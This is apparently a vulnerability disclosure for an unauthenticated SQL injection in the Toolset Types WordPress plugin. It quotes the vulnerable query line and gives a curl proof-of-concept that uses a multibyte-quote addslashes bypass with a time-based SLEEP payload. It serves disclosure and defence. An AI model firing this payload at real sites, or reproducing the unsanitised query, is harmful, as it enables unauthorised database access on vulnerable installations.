Toolset Types [SQL Injection]
Plugin Toolset Types [SQL Injection] is vulnerarable to unauthenticated SQL injection attacks.
Description
Plugin registers the AJAX action wpt_suggest_taxonomy_term which
provides a convenient way to search for WordPress terms. This action
calls \WPToolset_Forms_Bootstrap::wpt_suggest_taxonomy_term() method
which performs the requested search. This action is a non privileged one
so an attacker can perform this attack without authenticating himself.
Plugin supports WPML integration and if the WPML plugin is installed and
active it provides the functionality to search for translated terms by
using the taxonomy parameter in either request body or as a query param.
Because WordPress uses the addslashes() function to all request params,
in order for this attack to be successful a multibyte character encoding
must be set in DB, but this attack is still possible as [Chris Shiflett showed in this blog post]
(http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string).
Vulnerable code:
File toolset-forms/bootstrap.php, line 172:
$tax_where .= " AND t.term_id in (SELECT element_id from {$wpdb->prefix}icl_translations WHERE element_type = 'tax_{$_REQUEST['taxonomy']}' AND language_code = '{$lang}' ) ";
PoC
curl 'http://sbwptop.dev/wp-admin/admin-ajax.php'
-d 'action=wpt_suggest_taxonomy_term&q=1&taxonomy=%e5%27 AND (SLEEP(5)); --'
- 1 June 2016
- Pan Vag
- wp-types.com
- Toolset Types
- 2.0.1
- WordPress 4.5.2, WPML Multilingual CMS 3.1.9.7
- DWF-2016-87052